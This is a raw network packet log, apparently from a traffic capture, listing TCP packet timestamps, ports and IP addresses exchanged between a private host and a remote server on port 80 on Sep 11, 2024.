                                                Sep 11, 2024 20:22:25.135113001 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.135194063 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135204077 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135212898 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135226011 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135237932 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135241985 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.135262966 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.140595913 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.140661955 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.140736103 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.141813040 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.141860962 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.141966105 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.141976118 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.141988039 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.141998053 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142008066 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142008066 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142019033 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142028093 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142035007 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142045975 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142054081 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142055988 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142067909 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142083883 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142096996 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142107010 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142111063 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142118931 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142128944 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142141104 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142151117 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142168045 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142343044 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142353058 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142363071 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142373085 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142384052 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142390966 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142395020 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142402887 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142431021 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142443895 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142453909 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142462969 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142473936 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142491102 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142519951 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142610073 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142620087 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142628908 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142638922 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142649889 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142657042 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142672062 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142699957 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142709970 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142719030 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142730951 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142740965 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142745018 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142759085 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142767906 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142803907 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.264727116 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264847994 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264858961 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264868975 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264878988 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264892101 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264902115 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264910936 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264921904 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264930964 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264941931 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264969110 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264980078 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.264985085 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264980078 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.264996052 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265007019 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265017033 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265017986 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265017033 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265029907 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265031099 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265041113 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265053034 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265053988 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265063047 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265073061 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265074968 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265084982 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265099049 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265100002 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265117884 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265120983 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265127897 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265137911 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265146017 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265147924 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265160084 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265171051 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265172958 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265182018 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265192032 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265203953 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265204906 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265216112 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265225887 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265232086 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265239000 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265252113 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265259981 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265269995 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265283108 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265286922 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265295982 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265305996 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265312910 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265317917 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265327930 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265337944 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265343904 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265347958 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265361071 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265371084 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265376091 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265376091 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265382051 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265392065 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265403986 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265408039 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265418053 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265429974 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265439987 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265440941 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265453100 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265459061 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265464067 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265475035 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265485048 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265486956 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265496016 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265501022 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265528917 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265558004 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.272047043 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.272061110 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.272072077 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.272106886 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273299932 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273312092 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273322105 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273334026 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273345947 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273439884 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273452997 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273458004 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273458004 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273487091 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273530006 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273540020 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273552895 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273576021 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273696899 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273715973 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273727894 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273740053 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273741961 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273752928 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273763895 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273767948 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273777008 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273782015 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273788929 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273799896 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273812056 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273817062 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273823977 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273828030 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273834944 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273861885 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273873091 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273885012 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273895979 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273907900 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273916960 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273920059 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273931980 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273942947 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273945093 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273957014 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273963928 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273969889 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273996115 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.274056911 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274069071 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274085045 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274101019 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.274102926 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274113894 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274122000 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.274125099 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274143934 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274151087 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.274156094 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274168015 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274179935 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274185896 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.274194002 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274204969 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.274208069 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.274236917 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.275105000 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.275116920 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.275130033 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.275141954 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.275152922 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.275155067 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.275166988 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.275178909 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.275182009 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.275188923 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.275201082 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.275203943 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.275226116 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.278934002 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.278985977 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.279352903 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.279648066 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.279695034 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.356614113 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356632948 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356645107 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356657028 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356677055 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356688023 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356700897 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356714010 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356767893 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356774092 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.356780052 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356792927 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356806040 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356806040 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.356806040 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.356839895 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.356873035 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356885910 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356904030 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356914997 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356925964 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.356928110 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356960058 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.356976032 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.356988907 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.357024908 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.357096910 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.357112885 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.357151031 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.393944025 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.393974066 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394001961 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394015074 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394026041 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394027948 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394046068 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394054890 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394059896 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394071102 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394082069 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394085884 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394093990 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394105911 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394107103 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394119024 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394135952 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394145966 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394176960 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394190073 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394201040 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394228935 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394316912 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394365072 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394392014 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394403934 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394437075 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394515991 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394527912 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394539118 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394562960 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394583941 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394594908 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394608974 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394623041 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394650936 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394675016 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394686937 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394696951 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394722939 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394792080 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394803047 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394814014 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394825935 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.394840956 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.394864082 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395015955 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395028114 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395039082 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395051003 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395061970 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395062923 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395073891 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395092964 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395104885 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395179033 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395190001 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395200968 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395226002 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395266056 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395286083 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395297050 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395308971 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395312071 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395334959 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395426989 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395440102 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395451069 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395464897 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395477057 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395508051 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395556927 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395623922 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395637035 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395668983 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395729065 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395741940 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395751953 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395764112 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395776987 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395804882 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395874023 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395884991 CEST804916345.90.89.123192.168.2.22
